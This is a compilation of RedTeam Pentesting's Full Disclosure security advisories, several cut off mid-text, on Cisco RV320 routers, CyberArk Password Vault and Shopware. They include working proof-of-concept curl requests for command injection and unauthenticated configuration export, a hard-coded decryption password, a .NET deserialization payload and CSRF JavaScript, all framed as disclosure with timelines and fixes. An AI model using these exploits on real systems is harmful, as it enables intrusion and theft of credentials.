Introduction


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details


The router's web interface enables users to generate new X.509
certificates directly on the device. Previously, RedTeam Pentesting
identified a vulnerability (rt-sa-2018-004) [2] in this component. By
providing a specially crafted common name, it was possible to inject
shell commands which were subsequently executed on the router as the
root user. This vulnerability was adressed in firmware version 1.4.2.19
published by Cisco [3].

RedTeam Pentesting discovered that the certificate generator in the patched
firmware is still vulnerable. The update adds several filters to handle
single quotes in user input. However, these filters can be evaded by
specially crafted inputs. By providing the following string for the
certificate's common name, a "ping" command can be injected:


'a$(ping -c 4 192.168.1.2)'b



Proof of Concept


The following HTTP POST request invokes the certificate generator
function and triggers the command injection. It requires a valid session
cookie for the device's web interface. The user agent "curl" is
blacklisted by the firmware and must be adjusted in the HTTP client.


$ curl -s -k -A kurl -X POST -b "$COOKIE" \
--data "page=self_generator.htm=1=30"\
"=1_ch=1=4=A=A=A"\
"=A_unit=A=ab%40example.com"\
"=512=1024_days=30_c=1&"\
"SelectSubject_s=1" \
--data-urlencode "common_name='a\$(ping -c 4 192.168.1.2)'b" \
"https://192.168.1.1/certificate_handle2.htm?type=4;


Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at 192.168.1.2.


Workaround
==

Prevent untrusted users from using the router's web interface.


Fix
===

None


Security Risk
=

The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials to the web
interface, this vulnerability is only rated as a medium risk.


Timeline


2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-22 Firmware 1.4.2.20 released by vendor
2019-01-23 Advisory (rt-sa-2018-004) published

2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published


References
==

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
[3] 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowl

[FD] [RT-SA-2019-004] Cisco RV320 Unauthenticated Diagnostic Data Retrieval

2019-03-27 Thread RedTeam Pentesting GmbH
ityAdvisory/cisco-sa-20190123-rv-info


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2019-003] Cisco RV320 Unauthenticated Configuration Export

2019-03-27 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Configuration Export

RedTeam Pentesting discovered that the configuration of a Cisco RV320
router can still be exported without authentication via the device's web
interface due to an inadequate fix by the vendor.


Details
===

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


Introduction


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details


The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface, which is implemented in various CGI programs in
the device's firmware. Access to this web interface requires prior
authentication using a username and password. Previously, RedTeam
Pentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI
program:

/cgi-bin/config.exp

By issuing an HTTP GET request to this program, it was possible to
export a router's configuration without providing any prior
authentication. This vulnerability was adressed in firmware version
1.4.2.19 published by Cisco [3].

RedTeam Pentesting discovered that the CGI program in the patched
firmware is still vulnerable. By performing a specially crafted HTTP
POST request, attackers are still able to download the router's
configuration. The user agent "curl" is blacklisted by the firmware and
must be adjusted in the HTTP client. Again, exploitation does not
require any authentication.


Proof of Concept


A device's configuration can be retrieved by issuing an HTTP POST request
to the vulnerable CGI program (output shortened):


$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \
  'https://192.168.1.1/cgi-bin/config.exp'
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]



Workaround
==

Prevent untrusted clients from connecting to the device's web server.


Fix
===

None


Security Risk
=

This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By
downloading the configuration, attackers can obtain internal network
configuration, VPN or IPsec secrets, as well as password hashes for the
router's user accounts. Knowledge of a user's password hash is
sufficient to log into the router's web interface, cracking of the hash
is not required. Any information obtained through exploitation of this
vulnerability can be used to facilitate further compromise of the device
itself or attached networks.


Timeline


2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-22 Firmware 1.4.2.20 released by vendor
2019-01-23 Advisory (rt-sa-2018-002) published

2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published


References
==

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
[3] 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentestin

[FD] [RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple

2019-03-26 Thread RedTeam Pentesting GmbH
 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released 


References
======

[1] https://www.tldp.org/LDP/abs/html/
[2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE
[3] https://www.tldp.org/LDP/abs/html/internal.html#EX33
[4] https://www.tldp.org/LDP/abs/html/extmisc.html#EX33A


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2018-004] Cisco RV320 Command Injection

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Command Injection

RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router.


Details
===

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 and later
Fixed Versions: since 1.4.2.20
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652


Introduction


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details


The router's web interface enables users to generate new X.509
certificates directly on the device. A user may enter typical
configuration parameters required for the certificate, such as
organisation, the common name and so on. In order to generate the
certificate, the device uses the command-line program openssl [2]. The
device's firmware uses the following format string to assemble the
openssl command:


openssl req -new  -nodes  -subj 
'/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 
-out %s%s.csr -days %s -newkey rsa:%s  > /dev/null 2>&1


Although the web interface filters certain special characters via
JavaScript, there is actually no input filtering, escaping or encoding
happening on the server. This allows attackers to inject arbitrary
commands.


Proof of Concept


Even though all components of the subject seem to be vulnerable to
command injection, the following example uses the common name to trigger
a ping command:


a'$(ping -c 4 192.168.1.2)'b


The following HTTP POST request invokes the certificate generator
function and triggers the command injection. It requires a valid session
cookie for the device's web interface.


curl -s -b "$COOKIE" \
--data "page=self_generator.htm=1=30"\
"=1_ch=1=4=A=A=A"\
"=A_unit=A=ab%40example.com"\
"=512=1024_days=30_c=1&"\
"SelectSubject_s=1" \
--data-urlencode "common_name=a'\$(ping -c 4 192.168.1.2)'b" \
"http://192.168.1.1/certificate_handle2.htm?type=4;


Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at 192.168.1.2.


Workaround
==

Prevent untrusted users from using the router's web interface.


Fix
===

Install firmware version 1.4.2.20 (or later) on the router.


Security Risk
=

The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials to the web
interface, this vulnerability is only rated as a medium risk.


Timeline


2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-23 Advisory published


References
==

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://wiki.openssl.org/index.php/Command_Line_Utilities


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If yo

[FD] [RT-SA-2018-003] Cisco RV320 Unauthenticated Diagnostic Data Retrieval

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval

RedTeam Pentesting discovered that the Cisco RV320 router exposes
sensitive diagnostic data without authentication through the device's
web interface.


Details
===

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15, 1.4.2.17
Fixed Versions: since 1.4.2.19
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


Introduction


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details


The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface. In the device's firmware, this functionality is
implemented using a variety of CGI programs. Access to this web
interface requires prior authentication using a username and password.
RedTeam Pentesting discovered the CGI program:

/cgi-bin/export_debug_msg.exp

This program can be used to retrieve various diagnostic information from
the device, which includes its current configuration. In contrast to
other functions, this CGI program does not require any form of
authentication. It may be accessed through the router's web server,
which is available from the LAN by default. As described in [2],
firmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web
server to the WAN on TCP port 8007.


Proof of Concept


The diagnostic data can be retrieved by issuing an HTTP POST request to
the vulnerable CGI program. OpenSSL is used to decrypt the data with the
hard-coded password "NKDebug12#$%" before unpacking it with tar (output
shortened):


$ curl --data submitdebugmsg=1 \
  'http://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug

$ openssl aes-128-cbc -salt -md md5 -d \
  -k 'NKDebug12#$%' < debug > debug.tgz

$ mkdir output && tar -xf debug.tgz -C output/

$ ls -1 output/
debug_messages.txt
etc.tgz
nk_sysconfig
var.tgz

$ cat output/nk_sysconfig
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]



Workaround
==

Prevent untrusted clients from connecting to the device's web server.


Fix
===

Install firmware version 1.4.2.19 (or later) on the router.


Security Risk
=

This vulnerability is rated as a high risk as it exposes sensitive
diagnostic information, such as the device's configuration, to
untrusted, potentially malicious parties. By retrieving this
information, attackers can obtain internal network configuration, VPN or
IPsec secrets, as well as password hashes for the router's user
accounts. Knowledge of a user's password hash is sufficient to log into
the router's web interface. Any information obtained through
exploitation of this vulnerability can be used to facilitate further
compromise of the device itself or attached networks.


Timeline


2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-23 Advisory published


References
==

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in A

[FD] [RT-SA-2018-002] Cisco RV320 Unauthenticated Configuration Export

2019-01-24 Thread RedTeam Pentesting GmbH
Advisory: Cisco RV320 Unauthenticated Configuration Export

RedTeam Pentesting discovered that the configuration of a Cisco RV320
router may be exported without authentication through the device's web
interface.


Details
===

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15, 1.4.2.17
Fixed Versions: since 1.4.2.19
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653


Introduction


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])


More Details


The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface. In the device's firmware, this functionality is
implemented using a variety of CGI programs. Access to this web
interface requires prior authentication using a username and password.
RedTeam Pentesting discovered the CGI program:

/cgi-bin/config.exp

This program can be used to export the router's configuration. In
contrast to other functions, this CGI program does not require any form
of authentication. It may be accessed through the router's web server,
which is available from the LAN by default. As described in [2],
firmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web
server to the WAN on TCP port 8007.


Proof of Concept


A device's configuration can be retrieved by issuing an HTTP GET request
to the vulnerable CGI program (output shortened):


$ curl -s http://192.168.1.1/cgi-bin/config.exp
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]



Workaround
==

Prevent untrusted clients from connecting to the device's web server.


Fix
===

Install firmware version 1.4.2.19 (or later) on the router.


Security Risk
=

This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By
downloading the configuration, attackers can obtain internal network
configuration, VPN or IPsec secrets, as well as password hashes for the
router's user accounts. Knowledge of a user's password hash is
sufficient to log into the router's web interface. Any information
obtained through exploitation of this vulnerability can be used to
facilitate further compromise of the device itself or attached networks.


Timeline


2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-23 Advisory published


References
==

[1] 
https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Se

[FD] [RT-SA-2017-015] CyberArk Password Vault Memory Disclosure

2018-04-09 Thread RedTeam Pentesting GmbH
36f 7264 7300 2968 b8fb aae9  s_records.)h
0110: 62


Starting at offset 0xe0, the vault discloses a total of 49 bytes of its
memory to the client.


Workaround
==

None


Fix
===

Upgrade CyberArk Password Vault to version 9.7 or 10.


Security Risk
=

This vulnerability is rated as a high risk. Exploitation only requires
network access to a PrivateArk Password Vault. Although each request
only discloses about 50 bytes of memory, sustained exploitation will
likely reveal sensitive information at some point in time. This
critically undermines the primary purpose of the PrivateArk Password
Vault.


Timeline


2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released


References
==

[1] 
http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-014] CyberArk Password Vault Web Access Remote Code Execution

2018-04-09 Thread RedTeam Pentesting GmbH
tLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49
Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs
dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNSVN5
c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu
PWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYP
BVN0YXJ0CRAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXph
dGlvbkhvbGRlcgcETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpT
aWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5U
eXBlW10JDwkNCQ4GFD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBT
dGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVPlN5c3RlbS5EaWFnbm9z
dGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAoB
CgkGFgdDb21wYXJlCQwGGA1TeXN0ZW0uU3RyaW5nBhkrSW50
MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaMlN5c3RlbS5J
bnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAoBEAgA
AAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwg
VmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1
YzU2MTkzNGUwODldXQkMCgkMCRgJFgoL


Next, an API call is invoked which includes the malicious .NET object in
its authorization header. This is done with cURL [3] as follows:


$ curl -s -X GET -k \
  --url 'https://10.0.0.6/PasswordVault/WebServices/PIMServices.svc/'\
  'Applications/?Location=\=true' \
  --header "authorization: $(cat execute-ping.txt)" \
  --header 'content-type: application/json'


Simultaneously, tcpdump [4] is invoked on the host 10.0.0.19 to listen
for ICMP packets originating from the web server:


$ sudo tcpdump -i enp0s25 icmp
tcpdump: verbose output suppressed[...]
listening on enp0s25[...]

IP 10.0.0.6 > 10.0.0.19: ICMP echo request, id 1, seq 6, length 40
IP 10.0.0.19 > 10.0.0.6: ICMP echo reply, id 1, seq 6, length 40


The fact that ICMP packets are received from the web server, indicates
that attacker-controlled code was executed.


Workaround
==

Disable any access to the API at the route /PasswordVault/WebServices.


Fix
===

Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10 or
10.2.


Security Risk
=

The risk of this vulnerability is rated as high. Attackers with access
to the PrivateArk Vault Web Access REST API may execute arbitrary code
on the web server. No credentials are required. Attackers gain access to
the system with the privileges of the web application. Consequently,
such access may be used to backdoor the web application and compromise
further accounts and credentials. Additionally, attackers may pivot from
the web server to attack the vault directly.


Timeline


2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-02-28 Vendor released fixed version
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released


References
==

[1] 
http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf
[2] https://github.com/pwntester/ysoserial.net
[3] https://curl.haxx.se/
[4] https://www.tcpdump.org/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites

2018-03-13 Thread RedTeam Pentesting GmbH
Advisory: Shopware Cart Accessible by Third-Party Websites

RedTeam Pentesting discovered that the shopping cart implemented by Shopware
offers an insecure API. Malicious, third-party websites may abuse this API to
list, add or remove products from a user's cart.


Details
===

Product: Shopware
Affected Versions: 4.0.1 - 5.3.7
Fixed Versions: > 5.4.0
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: https://shopware.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"Shopware 5 is the next generation of open source e-commerce software made in
Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend
Framework Shopware comes as the perfect platform for your next e-commerce
project. Furthermore Shopware 5 provides an event-driven plugin system and an
advanced hook system, giving you the ability to customize every part of the
platform."
(from the Shopware GitHub repository [1])


More Details


The Shopware web application provides users with a virtual shopping cart to
collect products prior to checkout. This cart is displayed to the user as a
modal sidebar appearing at the right edge of the browser window. Consequently,
Shopware implements several API endpoints to allow JavaScript code to perform
shopping cart operations. These endpoints are implemented in the
"Shopware_Controllers_Frontend_Checkout" class and can be reached through the
following paths:

 * /checkout/ajaxCart
 * /checkout/ajaxAddArticleCart
 * /checkout/ajaxDeleteArticleCart

RedTeam Pentesting discovered that API endpoints support JSONP by specifying a
URL parameter named callback. The origin of calls to the cart API is not
validated. Therefore, any third-party website may make use of this API. If a
customer of a Shopware shop visits a malicious, attacker-controlled website,
JavaScript code on this site may access the user's shopping cart.


Proof of Concept


The following JavaScript snippets demonstrate how to access the cart of a
Shopware shop at "https://example.net; from a third-party website. The
"getJSON" function of jQuery 3 is used to interface with the JSONP API.

By running the following code, the contents of a cart may be retrieved. The
result of the API call is displayed on the browser's developer console.


$.getJSON("https://example.net/checkout/ajaxCart?callback=?;)
.done(console.log);


The following code adds a new product to the cart. In this case, two instances
of product 1234 are added.


$.getJSON(
  "https://example.net/checkout/ajaxAddArticleCart"+
  "?callback=?=1234=2"
).done(console.log);


